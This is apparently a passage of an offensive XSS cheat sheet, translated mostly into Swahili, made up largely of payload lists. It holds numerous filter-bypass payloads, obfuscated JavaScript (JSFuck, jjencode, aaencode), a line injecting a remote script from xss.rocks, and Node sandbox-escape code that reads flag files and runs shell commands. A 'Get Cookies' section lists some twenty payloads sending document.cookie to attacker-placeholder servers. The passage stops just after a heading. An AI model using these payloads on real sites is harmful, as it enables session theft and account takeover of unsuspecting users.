// These operations are called when the object is used as a primitive
// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
valueOf=alert;window+''
toString=alert;window+''


// Error handler
window.onerror=eval;throw"=alert\x281\x29";
onerror=eval;throw"=alert\x281\x29";
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
{onerror=eval}throw"=alert(1)" //No ";"
onerror=alert //No ";" using new line
throw 1337
// Error handler + Special unicode separators
eval("onerror=\u2028alert\u2029throw 1337");
// Error handler + Comma separator
// The comma separator goes through the list and returns only the last element
var a = (1,2,3,4,5,6) // a = 6
throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
throw onerror=alert,1,1,1,1,1,1337
// optional exception variables inside a catch clause.
try{throw onerror=alert}catch{throw 1}


// Has instance symbol
'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.

Mwito wa kazi yoyote (alert)

javascript

//Eval like functions
eval('ale'+'rt(1)')
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Function('ale'+'rt(10)')``;
[].constructor.constructor("alert(document.domain)")``
[]["constructor"]["constructor"]`$${alert()}```
import('data:text/javascript,alert(1)')

//General function executions
`` //Can be use as parenthesis
alert`document.cookie`
alert(document['cookie'])
with(document)alert(cookie)
(alert)(1)
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
<svg><animate onbegin=alert() attributeName=x></svg>

DOM vulnerabilities

Kuna JS code inayotumia data isiyokuwa salama inayoendeshwa na mshambuliaji kama location.href. Mshambuliaji anaweza kutumia hili kutekeleza msimbo wowote wa JS.
Kwa sababu ya urefu wa maelezo ya DOM vulnerabilities ilihamishiwa kwenye ukurasa huu:

DOM XSS

Utanakutana huko na maelezo ya kina kuhusu DOM vulnerabilities, jinsi zinavyosababishwa, na jinsi za kuzitumia.
Pia, usisahau kwamba mwishoni mwa chapisho kilicho takiwa unaweza kupata maelezo kuhusu DOM Clobbering attacks.

Upgrading Self-XSS

Ikiwa unaweza kuchochea XSS kwa kutuma payload ndani ya cookie, kawaida hii ni self-XSS. Hata hivyo, ukipata vulnerable subdomain to XSS, unaweza kutumia XSS hii kuingiza cookie kwa kikoa chote na hivyo kuchochea cookie XSS kwenye kikoa kikuu au subdomains nyingine (mmoja walio vulnerable kwa cookie XSS). Kwa hili unaweza kutumia cookie tossing attack:

Cookie Tossing

You can find a great abuse of this technique in this blog post.

Sending your session to the admin

Labda mtumiaji anaweza kushiriki wasifu wake na admin, na ikiwa self XSS iko ndani ya wasifu wa mtumiaji na admin anaiangalia, ataichochea udhaifu huo.

Session Mirroring

Ikiwa unapata self XSS na ukurasa wa wavuti una session mirroring for administrators, kwa mfano kuruhusu wateja kuomba msaada ili admin akupe msaada atakuwa anaona kile unachoona katika session yako lakini kutoka session yake.

Unaweza kumfanya administrator trigger your self XSS na kumpora cookies/session yake.

Other Bypasses

Normalised Unicode

Unaweza kuangalia kama reflected values zinafanyiwa unicode normalized kwenye server (au upande wa client) na kutumia kazi hii kuingia kando ya ulinzi. Find an example here.

PHP FILTER_VALIDATE_EMAIL flag Bypass

javascript

"><svg/onload=confirm(1)>"@x.y

Ruby-On-Rails bypass

Kutokana na RoR mass assignment nukuu zinaingizwa ndani ya HTML na kisha kikomo cha nukuu kinavunjwa na mashamba ya ziada (onfocus) yanaweza kuongezwa ndani ya tag.
Mfano wa fomu (from this report), ikiwa utatuma payload:

contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa

Jozi "Key","Value" itarudishwa kama hii:

{" onfocus=javascript:alert(&#39;xss&#39;) autofocus a"=>"a"}

Kisha, onfocus attribute itaingizwa na XSS itatokea.

Mchanganyiko maalum

html

<iframe/src="data:text/html,<svg onload=alert(1)>">
<input type=image src onerror="prompt(1)">
<svg onload=alert(1)//
<img src="/" =_=" title="onerror='prompt(1)'">
<img src='1' onerror='alert(0)' <
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg////////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1'&#41</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<svg><animate onbegin=alert() attributeName=x></svg>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)

XSS na injection ya header katika response ya 302

Ukipata kuwa unaweza kuingiza headers katika 302 Redirect response unaweza kujaribu kumfanya browser itekeleze arbitrary JavaScript. Hii si rahisi kwani browsers za kisasa hazitafsiri HTTP response body ikiwa HTTP response status code ni 302, hivyo payload ya cross-site scripting pekee haitakuwa na faida.

Katika this report na this one unaweza kusoma jinsi unavyoweza kujaribu protocols kadhaa ndani ya Location header na kuona ikiwa yoyote yao inaruhusu browser kukagua na kutekeleza payload ya XSS ndani ya body.\
Past known protocols: mailto://, //x:1/, ws://, wss://, empty Location header, resource://.

Herufi, Nambari na Nukta Pekee

Ikiwa unaweza kubainisha callback ambayo javascript itakayokuwa itekelezwe ikiwa imepunguzwa kwa herufi, nambari na nukta tu. Read this section of this post ili kujifunza jinsi ya kuudanganya tabia hii.

Valid `<script>` Content-Types to XSS

(From here) Ikiwa unajaribu kupakia script yenye content-type kama application/octet-stream, Chrome itatoa kosa lifuatalo:

Refused to execute script from ‘https://uploader.c.hc.lc/uploads/xxx' because its MIME type (‘application/octet-stream’) is not executable, and strict MIME type checking is enabled.

Ya pekee Content-Types zitakazomsaidia Chrome kutekeleza loaded script ni zile zilizomo kwenye const kSupportedJavascriptTypes kutoka https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc

const char* const kSupportedJavascriptTypes[] = {
"application/ecmascript",
"application/javascript",
"application/x-ecmascript",
"application/x-javascript",
"text/ecmascript",
"text/javascript",
"text/javascript1.0",
"text/javascript1.1",
"text/javascript1.2",
"text/javascript1.3",
"text/javascript1.4",
"text/javascript1.5",
"text/jscript",
"text/livescript",
"text/x-ecmascript",
"text/x-javascript",
};

Aina za Script kwa XSS

(From here) Kwa hivyo, ni aina gani zinaweza kuainishwa ili kupakia script?

html

<script type="???"></script>

Jibu ni:

module (default, hakuna cha kuelezea)
webbundle: Web Bundles ni kipengele kinachokuwezesha kukusanya data nyingi (HTML, CSS, JS…) pamoja ndani ya faili la .wbn.

html

<script type="webbundle">
{
"source": "https://example.com/dir/subresources.wbn",
"resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]
}
</script>
The resources are loaded from the source .wbn, not accessed via HTTP

importmap: Inaruhusu kuboresha sintaksi ya import

html

<script type="importmap">
{
"imports": {
"moment": "/node_modules/moment/src/moment.js",
"lodash": "/node_modules/lodash-es/lodash.js"
}
}
</script>

<!-- With importmap you can do the following -->
<script>
import moment from "moment"
import { partition } from "lodash"
</script>

Tabia hii ilitumiwa katika this writeup kurekebisha maktaba ili kutumia eval; kuitumia vibaya kunaweza kusababisha XSS.

speculationrules: Kipengele hiki hasa kimekusudiwa kutatua baadhi ya matatizo yanayosababishwa na pre-rendering. Kinafanya kazi kama ifuatavyo:

html

<script type="speculationrules">
{
"prerender": [
{ "source": "list", "urls": ["/page/2"], "score": 0.5 },
{
"source": "document",
"if_href_matches": ["https://*.wikipedia.org/**"],
"if_not_selector_matches": [".restricted-section *"],
"score": 0.1
}
]
}
</script>

Web Content-Types kwa XSS

(Kutoka here) Aina zifuatazo za Content-Types zinaweza kutekeleza XSS katika browsers zote:

text/html
application/xhtml+xml
application/xml
text/xml
image/svg+xml
text/plain (?? not in the list but I think I saw this in a CTF)
application/rss+xml (off)
application/atom+xml (off)

Katika browsers nyingine, Content-Types nyingine zinaweza kutumika kutekeleza arbitrary JS, angalia: https://github.com/BlackFan/content-type-research/blob/master/XSS.md

xml Content Type

Ikiwa ukurasa unarudisha content-type text/xml, inawezekana kuonyesha namespace na kutekeleza arbitrary JS:

xml

<xml>
<text>hello<img src="1" onerror="alert(1)" xmlns="http://www.w3.org/1999/xhtml" /></text>
</xml>

<!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->

Mifumo Maalum ya Ubadilishaji

Wakati kitu kama "some {{template}} data".replace("{{template}}", <user_input>) kinapotumika. Mshambuliaji anaweza kutumia special string replacements kujaribu kuvuka baadhi ya kinga: "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))

Kwa mfano katika this writeup, hili lilitumika ku-escape string ya JSON ndani ya script na kutekeleza code yoyote.

Cache ya Chrome kwa XSS

Chrome Cache to XSS

XS Jails Escape

Ikiwa una idadi ndogo tu ya characters za kutumia, angalia suluhisho hizi nyingine zinazofaa kwa matatizo ya XSJail:

javascript

// eval + unescape + regex
eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))

// use of with
with(console)log(123)
with(/console.log(1)/index.html)with(this)with(constructor)constructor(source)()
// Just replace console.log(1) to the real code, the code we want to run is:
//return String(process.mainModule.require('fs').readFileSync('flag.txt'))

with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))

//Final solution
with(
/with(String)
with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
with(mainModule)
with(require(k))
return(String(readFileSync(n)))
/)
with(this)
with(constructor)
constructor(source)()

// For more uses of with go to challenge misc/CaaSio PSE in
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE

Ikiwa everything is undefined kabla ya kutekeleza untrusted code (kama katika this writeup) inawezekana kuunda vitu vinavyofaa "out of nothing" ili kutumia vibaya utekelezaji wa arbitrary untrusted code:

Using import()

javascript

// although import "fs" doesn’t work, import('fs') does.
import("fs").then((m) => console.log(m.readFileSync("/flag.txt", "utf8")))

Kufikia require kwa njia isiyo ya moja kwa moja

Kulingana na hii modules hufunikwa na Node.js ndani ya function, kama ifuatavyo:

javascript

;(function (exports, require, module, __filename, __dirname) {
// our actual module code
})

Kwa hivyo, ikiwa kutoka kwenye module hiyo tunaweza kuitisha function nyingine, inawezekana kutumia arguments.callee.caller.arguments[1] kutoka kwenye function hiyo kupata require:

javascript

;(function () {
return arguments.callee.caller.arguments[1]("fs").readFileSync(
"/flag.txt",
"utf8"
)
})()

Kwa njia inayofanana na mfano uliopita, inawezekana use error handlers kufikia wrapper ya module na kupata require function:

javascript

try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Object = {}.constructor
String = "".constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
const oldStackTrace = Error.prepareStackTrace
try {
Error.prepareStackTrace = (err, structuredStackTrace) =>
structuredStackTrace
Error.captureStackTrace(this)
this.stack
} finally {
Error.prepareStackTrace = oldStackTrace
}
}
function trigger() {
const err = new CustomError()
console.log(err.stack[0])
for (const x of err.stack) {
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
const fn = x.getFunction()
console.log(String(fn).slice(0, 200))
console.log(fn?.arguments)
console.log("=".repeat(40))
if ((args = fn?.arguments)?.length > 0) {
req = args[1]
console.log(req("child_process").execSync("id").toString())
}
}
}
trigger()

Obfuscation & Advanced Bypass

Obfuscations tofauti katika ukurasa mmoja: https://aem1k.com/aurebesh.js/
https://github.com/aemkei/katakana.js
https://javascriptobfuscator.herokuapp.com/
https://skalman.github.io/UglifyJS-online/
http://www.jsfuck.com/
Mbinu za JSFuck zilizo ngumu zaidi: https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce
http://utf-8.jp/public/jjencode.html
https://utf-8.jp/public/aaencode.html
https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses

javascript

//Katana
<script>
([,ウ,,,,ア]=[]+{}
,[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
</script>

javascript

//JJencode
<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>

javascript

//JSFuck
<script>
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
</script>

javascript

//aaencode
ﾟωﾟﾉ = /｀ｍ´）ﾉ ~┻━┻   / /*´∇｀*/["_"]
o = ﾟｰﾟ = _ = 3
c = ﾟΘﾟ = ﾟｰﾟ - ﾟｰﾟ
ﾟДﾟ = ﾟΘﾟ = (o ^ _ ^ o) / (o ^ _ ^ o)
ﾟДﾟ = {
ﾟΘﾟ: "_",
ﾟωﾟﾉ: ((ﾟωﾟﾉ == 3) + "_")[ﾟΘﾟ],
ﾟｰﾟﾉ: (ﾟωﾟﾉ + "_")[o ^ _ ^ (o - ﾟΘﾟ)],
ﾟДﾟﾉ: ((ﾟｰﾟ == 3) + "_")[ﾟｰﾟ],
}
ﾟДﾟ[ﾟΘﾟ] = ((ﾟωﾟﾉ == 3) + "_")[c ^ _ ^ o]
ﾟДﾟ["c"] = (ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ - ﾟΘﾟ]
ﾟДﾟ["o"] = (ﾟДﾟ + "_")[ﾟΘﾟ]
ﾟoﾟ =
ﾟДﾟ["c"] +
ﾟДﾟ["o"] +
(ﾟωﾟﾉ + "_")[ﾟΘﾟ] +
((ﾟωﾟﾉ == 3) + "_")[ﾟｰﾟ] +
(ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ] +
((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ] +
((ﾟｰﾟ == 3) + "_")[ﾟｰﾟ - ﾟΘﾟ] +
ﾟДﾟ["c"] +
(ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ] +
ﾟДﾟ["o"] +
((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ]
ﾟДﾟ["_"] = (o ^ _ ^ o)[ﾟoﾟ][ﾟoﾟ]
ﾟεﾟ =
((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ] +
ﾟДﾟ.ﾟДﾟﾉ +
(ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ] +
((ﾟｰﾟ == 3) + "_")[o ^ _ ^ (o - ﾟΘﾟ)] +
((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ] +
(ﾟωﾟﾉ + "_")[ﾟΘﾟ]
ﾟｰﾟ += ﾟΘﾟ
ﾟДﾟ[ﾟεﾟ] = "\\"
ﾟДﾟ.ﾟΘﾟﾉ = (ﾟДﾟ + ﾟｰﾟ)[o ^ _ ^ (o - ﾟΘﾟ)]
oﾟｰﾟo = (ﾟωﾟﾉ + "_")[c ^ _ ^ o]
ﾟДﾟ[ﾟoﾟ] = '"'
ﾟДﾟ["_"](
ﾟДﾟ["_"](
ﾟεﾟ +
ﾟДﾟ[ﾟoﾟ] +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
ﾟΘﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) - ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
(ﾟｰﾟ + ﾟΘﾟ) +
(c ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟｰﾟ +
((o ^ _ ^ o) - ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟΘﾟ +
(c ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
(ﾟｰﾟ + (o ^ _ ^ o)) +
ﾟДﾟ[ﾟεﾟ] +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟｰﾟ +
(c ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟΘﾟ +
((o ^ _ ^ o) - ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
ﾟΘﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
ﾟΘﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) - ﾟΘﾟ) +
(o ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
ﾟｰﾟ +
(o ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) - ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟΘﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
(c ^ _ ^ o) +
ﾟДﾟ[ﾟεﾟ] +
ﾟΘﾟ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
ﾟｰﾟ +
ﾟДﾟ[ﾟεﾟ] +
ﾟｰﾟ +
((o ^ _ ^ o) - ﾟΘﾟ) +
ﾟДﾟ[ﾟεﾟ] +
(ﾟｰﾟ + ﾟΘﾟ) +
ﾟΘﾟ +
ﾟДﾟ[ﾟoﾟ]
)(ﾟΘﾟ)
)("_")

javascript

// It's also possible to execute JS code only with the chars: []`+!${}

XSS payloads za kawaida

Payloads kadhaa katika 1

Steal Info JS

Iframe Trap

Lazimisha mtumiaji avinjari kwenye ukurasa bila kutoka katika iframe na uibe vitendo vyake (ikiwa ni pamoja na taarifa zilizotumwa kwenye fomu):

Iframe Traps

Pata Cookies

javascript

<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
<script>var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie</script>
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>

tip

Hutaweza kufikia cookies kutoka JavaScript ikiwa bendera ya HTTPOnly imewekwa kwenye cookie. Lakini hapa kuna njia kadhaa za kuzunguka ulinzi huu ikiwa utakuwa na bahati.

Kuiba Yaliyomo ya Ukurasa

javascript

